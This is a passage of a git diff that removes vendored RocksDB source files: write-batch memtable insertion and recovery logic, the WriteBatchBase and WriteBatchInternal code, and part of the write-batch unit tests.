-                               const Slice& end_key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::DeleteRange(rebuilding_trx_, column_family_id,
-                                      begin_key, end_key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-    if (db_ != nullptr) {
-      auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-      if (cf_handle == nullptr) {
-        cf_handle = db_->DefaultColumnFamily();
-      }
-      auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cf_handle)->cfd();
-      if (!cfd->is_delete_range_supported()) {
-        return Status::NotSupported(
-            std::string("DeleteRange not supported for table type ") +
-            cfd->ioptions()->table_factory->Name() + " in CF " +
-            cfd->GetName());
-      }
-    }
-
-    return DeleteImpl(column_family_id, begin_key, end_key, kTypeRangeDeletion);
-  }
-
-  virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-    assert(!concurrent_memtable_writes_);
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Merge(rebuilding_trx_, column_family_id, key, value);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    MemTable* mem = cf_mems_->GetMemTable();
-    auto* moptions = mem->GetImmutableMemTableOptions();
-    bool perform_merge = false;
-
-    // If we pass DB through and options.max_successive_merges is hit
-    // during recovery, Get() will be issued which will try to acquire
-    // DB mutex and cause deadlock, as DB mutex is already held.
-    // So we disable merge in recovery
-    if (moptions->max_successive_merges > 0 && db_ != nullptr &&
-        recovering_log_number_ == 0) {
-      LookupKey lkey(key, sequence_);
-
-      // Count the number of successive merges at the head
-      // of the key in the memtable
-      size_t num_merges = mem->CountSuccessiveMergeEntries(lkey);
-
-      if (num_merges >= moptions->max_successive_merges) {
-        perform_merge = true;
-      }
-    }
-
-    if (perform_merge) {
-      // 1) Get the existing value
-      std::string get_value;
-
-      // Pass in the sequence number so that we also include previous merge
-      // operations in the same batch.
-      SnapshotImpl read_from_snapshot;
-      read_from_snapshot.number_ = sequence_;
-      ReadOptions read_options;
-      read_options.snapshot = &read_from_snapshot;
-
-      auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-      if (cf_handle == nullptr) {
-        cf_handle = db_->DefaultColumnFamily();
-      }
-      db_->Get(read_options, cf_handle, key, &get_value);
-      Slice get_value_slice = Slice(get_value);
-
-      // 2) Apply this merge
-      auto merge_operator = moptions->merge_operator;
-      assert(merge_operator);
-
-      std::string new_value;
-
-      Status merge_status = MergeHelper::TimedFullMerge(
-          merge_operator, key, &get_value_slice, {value}, &new_value,
-          moptions->info_log, moptions->statistics, Env::Default());
-
-      if (!merge_status.ok()) {
-        // Failed to merge!
-        // Store the delta in memtable
-        perform_merge = false;
-      } else {
-        // 3) Add value to memtable
-        mem->Add(sequence_, kTypeValue, key, new_value);
-      }
-    }
-
-    if (!perform_merge) {
-      // Add merge operator to memtable
-      mem->Add(sequence_, kTypeMerge, key, value);
-    }
-
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status PutBlobIndexCF(uint32_t column_family_id, const Slice& key,
-                                const Slice& value) override {
-    // Same as PutCF except for value type.
-    return PutCFImpl(column_family_id, key, value, kTypeBlobIndex);
-  }
-
-  void CheckMemtableFull() {
-    if (flush_scheduler_ != nullptr) {
-      auto* cfd = cf_mems_->current();
-      assert(cfd != nullptr);
-      if (cfd->mem()->ShouldScheduleFlush() &&
-          cfd->mem()->MarkFlushScheduled()) {
-        // MarkFlushScheduled only returns true if we are the one that
-        // should take action, so no need to dedup further
-        flush_scheduler_->ScheduleFlush(cfd);
-      }
-    }
-  }
-
-  Status MarkBeginPrepare() override {
-    assert(rebuilding_trx_ == nullptr);
-    assert(db_);
-
-    if (recovering_log_number_ != 0) {
-      // during recovery we rebuild a hollow transaction
-      // from all encountered prepare sections of the wal
-      if (db_->allow_2pc() == false) {
-        return Status::NotSupported(
-            "WAL contains prepared transactions. Open with "
-            "TransactionDB::Open().");
-      }
-
-      // we are now iterating through a prepared section
-      rebuilding_trx_ = new WriteBatch();
-      if (has_valid_writes_ != nullptr) {
-        *has_valid_writes_ = true;
-      }
-    } else {
-      // in non-recovery we ignore prepare markers
-      // and insert the values directly. making sure we have a
-      // log for each insertion to reference.
-      assert(log_number_ref_ > 0);
-    }
-
-    return Status::OK();
-  }
-
-  Status MarkEndPrepare(const Slice& name) override {
-    assert(db_);
-    assert((rebuilding_trx_ != nullptr) == (recovering_log_number_ != 0));
-
-    if (recovering_log_number_ != 0) {
-      assert(db_->allow_2pc());
-      db_->InsertRecoveredTransaction(recovering_log_number_, name.ToString(),
-                                      rebuilding_trx_);
-      rebuilding_trx_ = nullptr;
-    } else {
-      assert(rebuilding_trx_ == nullptr);
-      assert(log_number_ref_ > 0);
-    }
-
-    return Status::OK();
-  }
-
-  Status MarkCommit(const Slice& name) override {
-    assert(db_);
-
-    Status s;
-
-    if (recovering_log_number_ != 0) {
-      // in recovery when we encounter a commit marker
-      // we lookup this transaction in our set of rebuilt transactions
-      // and commit.
-      auto trx = db_->GetRecoveredTransaction(name.ToString());
-
-      // the log contaiting the prepared section may have
-      // been released in the last incarnation because the
-      // data was flushed to L0
-      if (trx != nullptr) {
-        // at this point individual CF lognumbers will prevent
-        // duplicate re-insertion of values.
-        assert(log_number_ref_ == 0);
-        // all insertes must reference this trx log number
-        log_number_ref_ = trx->log_number_;
-        s = trx->batch_->Iterate(this);
-        log_number_ref_ = 0;
-
-        if (s.ok()) {
-          db_->DeleteRecoveredTransaction(name.ToString());
-        }
-        if (has_valid_writes_ != nullptr) {
-          *has_valid_writes_ = true;
-        }
-      }
-    } else {
-      // in non recovery we simply ignore this tag
-    }
-
-    return s;
-  }
-
-  Status MarkRollback(const Slice& name) override {
-    assert(db_);
-
-    if (recovering_log_number_ != 0) {
-      auto trx = db_->GetRecoveredTransaction(name.ToString());
-
-      // the log containing the transactions prep section
-      // may have been released in the previous incarnation
-      // because we knew it had been rolled back
-      if (trx != nullptr) {
-        db_->DeleteRecoveredTransaction(name.ToString());
-      }
-    } else {
-      // in non recovery we simply ignore this tag
-    }
-
-    return Status::OK();
-  }
-
- private:
-  MemTablePostProcessInfo* get_post_process_info(MemTable* mem) {
-    if (!concurrent_memtable_writes_) {
-      // No need to batch counters locally if we don't use concurrent mode.
-      return nullptr;
-    }
-    return &GetPostMap()[mem];
-  }
-};
-
-// This function can only be called in these conditions:
-// 1) During Recovery()
-// 2) During Write(), in a single-threaded write thread
-// 3) During Write(), in a concurrent context where memtables has been cloned
-// The reason is that it calls memtables->Seek(), which has a stateful cache
-Status WriteBatchInternal::InsertInto(WriteThread::WriteGroup& write_group,
-                                      SequenceNumber sequence,
-                                      ColumnFamilyMemTables* memtables,
-                                      FlushScheduler* flush_scheduler,
-                                      bool ignore_missing_column_families,
-                                      uint64_t recovery_log_number, DB* db,
-                                      bool concurrent_memtable_writes) {
-  MemTableInserter inserter(sequence, memtables, flush_scheduler,
-                            ignore_missing_column_families, recovery_log_number,
-                            db, concurrent_memtable_writes);
-  for (auto w : write_group) {
-    if (!w->ShouldWriteToMemtable()) {
-      continue;
-    }
-    SetSequence(w->batch, inserter.sequence());
-    w->sequence = inserter.sequence();
-    inserter.set_log_number_ref(w->log_ref);
-    w->status = w->batch->Iterate(&inserter);
-    if (!w->status.ok()) {
-      return w->status;
-    }
-  }
-  return Status::OK();
-}
-
-Status WriteBatchInternal::InsertInto(WriteThread::Writer* writer,
-                                      SequenceNumber sequence,
-                                      ColumnFamilyMemTables* memtables,
-                                      FlushScheduler* flush_scheduler,
-                                      bool ignore_missing_column_families,
-                                      uint64_t log_number, DB* db,
-                                      bool concurrent_memtable_writes) {
-  assert(writer->ShouldWriteToMemtable());
-  MemTableInserter inserter(sequence, memtables, flush_scheduler,
-                            ignore_missing_column_families, log_number, db,
-                            concurrent_memtable_writes);
-  SetSequence(writer->batch, sequence);
-  inserter.set_log_number_ref(writer->log_ref);
-  Status s = writer->batch->Iterate(&inserter);
-  if (concurrent_memtable_writes) {
-    inserter.PostProcess();
-  }
-  return s;
-}
-
-Status WriteBatchInternal::InsertInto(
-    const WriteBatch* batch, ColumnFamilyMemTables* memtables,
-    FlushScheduler* flush_scheduler, bool ignore_missing_column_families,
-    uint64_t log_number, DB* db, bool concurrent_memtable_writes,
-    SequenceNumber* last_seq_used, bool* has_valid_writes) {
-  MemTableInserter inserter(Sequence(batch), memtables, flush_scheduler,
-                            ignore_missing_column_families, log_number, db,
-                            concurrent_memtable_writes, has_valid_writes);
-  Status s = batch->Iterate(&inserter);
-  if (last_seq_used != nullptr) {
-    *last_seq_used = inserter.sequence();
-  }
-  if (concurrent_memtable_writes) {
-    inserter.PostProcess();
-  }
-  return s;
-}
-
-Status WriteBatchInternal::SetContents(WriteBatch* b, const Slice& contents) {
-  assert(contents.size() >= WriteBatchInternal::kHeader);
-  b->rep_.assign(contents.data(), contents.size());
-  b->content_flags_.store(ContentFlags::DEFERRED, std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::Append(WriteBatch* dst, const WriteBatch* src,
-                                  const bool wal_only) {
-  size_t src_len;
-  int src_count;
-  uint32_t src_flags;
-
-  const SavePoint& batch_end = src->GetWalTerminationPoint();
-
-  if (wal_only && !batch_end.is_cleared()) {
-    src_len = batch_end.size - WriteBatchInternal::kHeader;
-    src_count = batch_end.count;
-    src_flags = batch_end.content_flags;
-  } else {
-    src_len = src->rep_.size() - WriteBatchInternal::kHeader;
-    src_count = Count(src);
-    src_flags = src->content_flags_.load(std::memory_order_relaxed);
-  }
-
-  SetCount(dst, Count(dst) + src_count);
-  assert(src->rep_.size() >= WriteBatchInternal::kHeader);
-  dst->rep_.append(src->rep_.data() + WriteBatchInternal::kHeader, src_len);
-  dst->content_flags_.store(
-      dst->content_flags_.load(std::memory_order_relaxed) | src_flags,
-      std::memory_order_relaxed);
-  return Status::OK();
-}
-
-size_t WriteBatchInternal::AppendedByteSize(size_t leftByteSize,
-                                            size_t rightByteSize) {
-  if (leftByteSize == 0 || rightByteSize == 0) {
-    return leftByteSize + rightByteSize;
-  } else {
-    return leftByteSize + rightByteSize - WriteBatchInternal::kHeader;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_base.cc b/thirdparty/rocksdb/db/write_batch_base.cc
deleted file mode 100644
index 5522c1f..0000000
--- a/thirdparty/rocksdb/db/write_batch_base.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/write_batch_base.h"
-
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// Simple implementation of SlicePart variants of Put().  Child classes
-// can override these method with more performant solutions if they choose.
-Status WriteBatchBase::Put(ColumnFamilyHandle* column_family,
-                           const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Put(column_family, key_slice, value_slice);
-}
-
-Status WriteBatchBase::Put(const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Put(key_slice, value_slice);
-}
-
-Status WriteBatchBase::Delete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return Delete(column_family, key_slice);
-}
-
-Status WriteBatchBase::Delete(const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return Delete(key_slice);
-}
-
-Status WriteBatchBase::SingleDelete(ColumnFamilyHandle* column_family,
-                                    const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return SingleDelete(column_family, key_slice);
-}
-
-Status WriteBatchBase::SingleDelete(const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return SingleDelete(key_slice);
-}
-
-Status WriteBatchBase::DeleteRange(ColumnFamilyHandle* column_family,
-                                   const SliceParts& begin_key,
-                                   const SliceParts& end_key) {
-  std::string begin_key_buf, end_key_buf;
-  Slice begin_key_slice(begin_key, &begin_key_buf);
-  Slice end_key_slice(end_key, &end_key_buf);
-  return DeleteRange(column_family, begin_key_slice, end_key_slice);
-}
-
-Status WriteBatchBase::DeleteRange(const SliceParts& begin_key,
-                                   const SliceParts& end_key) {
-  std::string begin_key_buf, end_key_buf;
-  Slice begin_key_slice(begin_key, &begin_key_buf);
-  Slice end_key_slice(end_key, &end_key_buf);
-  return DeleteRange(begin_key_slice, end_key_slice);
-}
-
-Status WriteBatchBase::Merge(ColumnFamilyHandle* column_family,
-                             const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Merge(column_family, key_slice, value_slice);
-}
-
-Status WriteBatchBase::Merge(const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Merge(key_slice, value_slice);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_internal.h b/thirdparty/rocksdb/db/write_batch_internal.h
deleted file mode 100644
index 2408686..0000000
--- a/thirdparty/rocksdb/db/write_batch_internal.h
+++ /dev/null
@@ -1,230 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-#include "db/write_thread.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class MemTable;
-class FlushScheduler;
-class ColumnFamilyData;
-
-class ColumnFamilyMemTables {
- public:
-  virtual ~ColumnFamilyMemTables() {}
-  virtual bool Seek(uint32_t column_family_id) = 0;
-  // returns true if the update to memtable should be ignored
-  // (useful when recovering from log whose updates have already
-  // been processed)
-  virtual uint64_t GetLogNumber() const = 0;
-  virtual MemTable* GetMemTable() const = 0;
-  virtual ColumnFamilyHandle* GetColumnFamilyHandle() = 0;
-  virtual ColumnFamilyData* current() { return nullptr; }
-};
-
-class ColumnFamilyMemTablesDefault : public ColumnFamilyMemTables {
- public:
-  explicit ColumnFamilyMemTablesDefault(MemTable* mem)
-      : ok_(false), mem_(mem) {}
-
-  bool Seek(uint32_t column_family_id) override {
-    ok_ = (column_family_id == 0);
-    return ok_;
-  }
-
-  uint64_t GetLogNumber() const override { return 0; }
-
-  MemTable* GetMemTable() const override {
-    assert(ok_);
-    return mem_;
-  }
-
-  ColumnFamilyHandle* GetColumnFamilyHandle() override { return nullptr; }
-
- private:
-  bool ok_;
-  MemTable* mem_;
-};
-
-// WriteBatchInternal provides static methods for manipulating a
-// WriteBatch that we don't want in the public WriteBatch interface.
-class WriteBatchInternal {
- public:
-
-  // WriteBatch header has an 8-byte sequence number followed by a 4-byte count.
-  static const size_t kHeader = 12;
-
-  // WriteBatch methods with column_family_id instead of ColumnFamilyHandle*
-  static Status Put(WriteBatch* batch, uint32_t column_family_id,
-                    const Slice& key, const Slice& value);
-
-  static Status Put(WriteBatch* batch, uint32_t column_family_id,
-                    const SliceParts& key, const SliceParts& value);
-
-  static Status Delete(WriteBatch* batch, uint32_t column_family_id,
-                       const SliceParts& key);
-
-  static Status Delete(WriteBatch* batch, uint32_t column_family_id,
-                       const Slice& key);
-
-  static Status SingleDelete(WriteBatch* batch, uint32_t column_family_id,
-                             const SliceParts& key);
-
-  static Status SingleDelete(WriteBatch* batch, uint32_t column_family_id,
-                             const Slice& key);
-
-  static Status DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                            const Slice& begin_key, const Slice& end_key);
-
-  static Status DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                            const SliceParts& begin_key,
-                            const SliceParts& end_key);
-
-  static Status Merge(WriteBatch* batch, uint32_t column_family_id,
-                      const Slice& key, const Slice& value);
-
-  static Status Merge(WriteBatch* batch, uint32_t column_family_id,
-                      const SliceParts& key, const SliceParts& value);
-
-  static Status PutBlobIndex(WriteBatch* batch, uint32_t column_family_id,
-                             const Slice& key, const Slice& value);
-
-  static Status MarkEndPrepare(WriteBatch* batch, const Slice& xid);
-
-  static Status MarkRollback(WriteBatch* batch, const Slice& xid);
-
-  static Status MarkCommit(WriteBatch* batch, const Slice& xid);
-
-  static Status InsertNoop(WriteBatch* batch);
-
-  // Return the number of entries in the batch.
-  static int Count(const WriteBatch* batch);
-
-  // Set the count for the number of entries in the batch.
-  static void SetCount(WriteBatch* batch, int n);
-
-  // Return the seqeunce number for the start of this batch.
-  static SequenceNumber Sequence(const WriteBatch* batch);
-
-  // Store the specified number as the seqeunce number for the start of
-  // this batch.
-  static void SetSequence(WriteBatch* batch, SequenceNumber seq);
-
-  // Returns the offset of the first entry in the batch.
-  // This offset is only valid if the batch is not empty.
-  static size_t GetFirstOffset(WriteBatch* batch);
-
-  static Slice Contents(const WriteBatch* batch) {
-    return Slice(batch->rep_);
-  }
-
-  static size_t ByteSize(const WriteBatch* batch) {
-    return batch->rep_.size();
-  }
-
-  static Status SetContents(WriteBatch* batch, const Slice& contents);
-
-  // Inserts batches[i] into memtable, for i in 0..num_batches-1 inclusive.
-  //
-  // If ignore_missing_column_families == true. WriteBatch
-  // referencing non-existing column family will be ignored.
-  // If ignore_missing_column_families == false, processing of the
-  // batches will be stopped if a reference is found to a non-existing
-  // column family and InvalidArgument() will be returned.  The writes
-  // in batches may be only partially applied at that point.
-  //
-  // If log_number is non-zero, the memtable will be updated only if
-  // memtables->GetLogNumber() >= log_number.
-  //
-  // If flush_scheduler is non-null, it will be invoked if the memtable
-  // should be flushed.
-  //
-  // Under concurrent use, the caller is responsible for making sure that
-  // the memtables object itself is thread-local.
-  static Status InsertInto(WriteThread::WriteGroup& write_group,
-                           SequenceNumber sequence,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false);
-
-  // Convenience form of InsertInto when you have only one batch
-  // last_seq_used returns the last sequnce number used in a MemTable insert
-  static Status InsertInto(const WriteBatch* batch,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false,
-                           SequenceNumber* last_seq_used = nullptr,
-                           bool* has_valid_writes = nullptr);
-
-  static Status InsertInto(WriteThread::Writer* writer, SequenceNumber sequence,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false);
-
-  static Status Append(WriteBatch* dst, const WriteBatch* src,
-                       const bool WAL_only = false);
-
-  // Returns the byte size of appending a WriteBatch with ByteSize
-  // leftByteSize and a WriteBatch with ByteSize rightByteSize
-  static size_t AppendedByteSize(size_t leftByteSize, size_t rightByteSize);
-};
-
-// LocalSavePoint is similar to a scope guard
-class LocalSavePoint {
- public:
-  explicit LocalSavePoint(WriteBatch* batch)
-      : batch_(batch),
-        savepoint_(batch->GetDataSize(), batch->Count(),
-                   batch->content_flags_.load(std::memory_order_relaxed))
-#ifndef NDEBUG
-        ,
-        committed_(false)
-#endif
-  {
-  }
-
-#ifndef NDEBUG
-  ~LocalSavePoint() { assert(committed_); }
-#endif
-  Status commit() {
-#ifndef NDEBUG
-    committed_ = true;
-#endif
-    if (batch_->max_bytes_ && batch_->rep_.size() > batch_->max_bytes_) {
-      batch_->rep_.resize(savepoint_.size);
-      WriteBatchInternal::SetCount(batch_, savepoint_.count);
-      batch_->content_flags_.store(savepoint_.content_flags,
-                                   std::memory_order_relaxed);
-      return Status::MemoryLimit();
-    }
-    return Status::OK();
-  }
-
- private:
-  WriteBatch* batch_;
-  SavePoint savepoint_;
-#ifndef NDEBUG
-  bool committed_;
-#endif
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_test.cc b/thirdparty/rocksdb/db/write_batch_test.cc
deleted file mode 100644
index 4584793..0000000
--- a/thirdparty/rocksdb/db/write_batch_test.cc
+++ /dev/null
@@ -1,894 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/db.h"
-
-#include <memory>
-#include "db/column_family.h"
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static std::string PrintContents(WriteBatch* b) {
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  Options options;
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-  std::string state;
-  ColumnFamilyMemTablesDefault cf_mems_default(mem);
-  Status s = WriteBatchInternal::InsertInto(b, &cf_mems_default, nullptr);
-  int count = 0;
-  int put_count = 0;
-  int delete_count = 0;
-  int single_delete_count = 0;
-  int delete_range_count = 0;
-  int merge_count = 0;
-  for (int i = 0; i < 2; ++i) {
-    Arena arena;
-    ScopedArenaIterator arena_iter_guard;
-    std::unique_ptr<InternalIterator> iter_guard;
-    InternalIterator* iter;
-    if (i == 0) {
-      iter = mem->NewIterator(ReadOptions(), &arena);
-      arena_iter_guard.set(iter);
-    } else {
-      iter = mem->NewRangeTombstoneIterator(ReadOptions());
-      iter_guard.reset(iter);
-    }
-    if (iter == nullptr) {
-      continue;
-    }
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ParsedInternalKey ikey;
-      ikey.clear();
-      EXPECT_TRUE(ParseInternalKey(iter->key(), &ikey));
-      switch (ikey.type) {
-        case kTypeValue:
-          state.append("Put(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          put_count++;
-          break;
-        case kTypeDeletion:
-          state.append("Delete(");
-          state.append(ikey.user_key.ToString());
-          state.append(")");
-          count++;
-          delete_count++;
-          break;
-        case kTypeSingleDeletion:
-          state.append("SingleDelete(");
-          state.append(ikey.user_key.ToString());
-          state.append(")");
-          count++;
-          single_delete_count++;
-          break;
-        case kTypeRangeDeletion:
-          state.append("DeleteRange(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          delete_range_count++;
-          break;
-        case kTypeMerge:
-          state.append("Merge(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          merge_count++;
-          break;
-        default:
-          assert(false);
-          break;
-      }
-      state.append("@");
-      state.append(NumberToString(ikey.sequence));
-    }
-  }
-  EXPECT_EQ(b->HasPut(), put_count > 0);
-  EXPECT_EQ(b->HasDelete(), delete_count > 0);
-  EXPECT_EQ(b->HasSingleDelete(), single_delete_count > 0);
-  EXPECT_EQ(b->HasDeleteRange(), delete_range_count > 0);
-  EXPECT_EQ(b->HasMerge(), merge_count > 0);
-  if (!s.ok()) {
-    state.append(s.ToString());
-  } else if (count != WriteBatchInternal::Count(b)) {
-    state.append("CountMismatch()");
-  }
-  delete mem->Unref();
-  return state;
-}
-
-class WriteBatchTest : public testing::Test {};
-
-TEST_F(WriteBatchTest, Empty) {
-  WriteBatch batch;
-  ASSERT_EQ("", PrintContents(&batch));
-  ASSERT_EQ(0, WriteBatchInternal::Count(&batch));
-  ASSERT_EQ(0, batch.Count());
-}
-
-TEST_F(WriteBatchTest, Multiple) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-  batch.Delete(Slice("box"));
-  batch.DeleteRange(Slice("bar"), Slice("foo"));
-  batch.Put(Slice("baz"), Slice("boo"));
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ(100U, WriteBatchInternal::Sequence(&batch));
-  ASSERT_EQ(4, WriteBatchInternal::Count(&batch));
-  ASSERT_EQ(
-      "Put(baz, boo)@103"
-      "Delete(box)@101"
-      "Put(foo, bar)@100"
-      "DeleteRange(bar, foo)@102",
-      PrintContents(&batch));
-  ASSERT_EQ(4, batch.Count());
-}
-
-TEST_F(WriteBatchTest, Corruption) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-  batch.Delete(Slice("box"));
-  WriteBatchInternal::SetSequence(&batch, 200);
-  Slice contents = WriteBatchInternal::Contents(&batch);
-  WriteBatchInternal::SetContents(&batch,
-                                  Slice(contents.data(),contents.size()-1));
-  ASSERT_EQ("Put(foo, bar)@200"
-            "Corruption: bad WriteBatch Delete",
-            PrintContents(&batch));
-}
-
-TEST_F(WriteBatchTest, Append) {
-  WriteBatch b1, b2;
-  WriteBatchInternal::SetSequence(&b1, 200);
-  WriteBatchInternal::SetSequence(&b2, 300);
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("",
-            PrintContents(&b1));
-  ASSERT_EQ(0, b1.Count());
-  b2.Put("a", "va");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200",
-            PrintContents(&b1));
-  ASSERT_EQ(1, b1.Count());
-  b2.Clear();
-  b2.Put("b", "vb");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200"
-            "Put(b, vb)@201",
-            PrintContents(&b1));
-  ASSERT_EQ(2, b1.Count());
-  b2.Delete("foo");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200"
-            "Put(b, vb)@202"
-            "Put(b, vb)@201"
-            "Delete(foo)@203",
-            PrintContents(&b1));
-  ASSERT_EQ(4, b1.Count());
-  b2.Clear();
-  b2.Put("c", "cc");
-  b2.Put("d", "dd");
-  b2.MarkWalTerminationPoint();
-  b2.Put("e", "ee");
-  WriteBatchInternal::Append(&b1, &b2, /*wal only*/ true);
-  ASSERT_EQ(
-      "Put(a, va)@200"
-      "Put(b, vb)@202"
-      "Put(b, vb)@201"
-      "Put(c, cc)@204"
-      "Put(d, dd)@205"
-      "Delete(foo)@203",
-      PrintContents(&b1));
-  ASSERT_EQ(6, b1.Count());
-  ASSERT_EQ(
-      "Put(c, cc)@0"
-      "Put(d, dd)@1"
-      "Put(e, ee)@2",
-      PrintContents(&b2));
-  ASSERT_EQ(3, b2.Count());
-}
-
-TEST_F(WriteBatchTest, SingleDeletion) {
-  WriteBatch batch;
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ("", PrintContents(&batch));
-  ASSERT_EQ(0, batch.Count());
-  batch.Put("a", "va");
-  ASSERT_EQ("Put(a, va)@100", PrintContents(&batch));
-  ASSERT_EQ(1, batch.Count());
-  batch.SingleDelete("a");
-  ASSERT_EQ(
-      "SingleDelete(a)@101"
-      "Put(a, va)@100",
-      PrintContents(&batch));
-  ASSERT_EQ(2, batch.Count());
-}
-
-namespace {
-  struct TestHandler : public WriteBatch::Handler {
-    std::string seen;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      if (column_family_id == 0) {
-        seen += "Put(" + key.ToString() + ", " + value.ToString() + ")";
-      } else {
-        seen += "PutCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ", " + value.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      if (column_family_id == 0) {
-        seen += "Delete(" + key.ToString() + ")";
-      } else {
-        seen += "DeleteCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      if (column_family_id == 0) {
-        seen += "SingleDelete(" + key.ToString() + ")";
-      } else {
-        seen += "SingleDeleteCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteRangeCF(uint32_t column_family_id,
-                                 const Slice& begin_key,
-                                 const Slice& end_key) override {
-      if (column_family_id == 0) {
-        seen += "DeleteRange(" + begin_key.ToString() + ", " +
-                end_key.ToString() + ")";
-      } else {
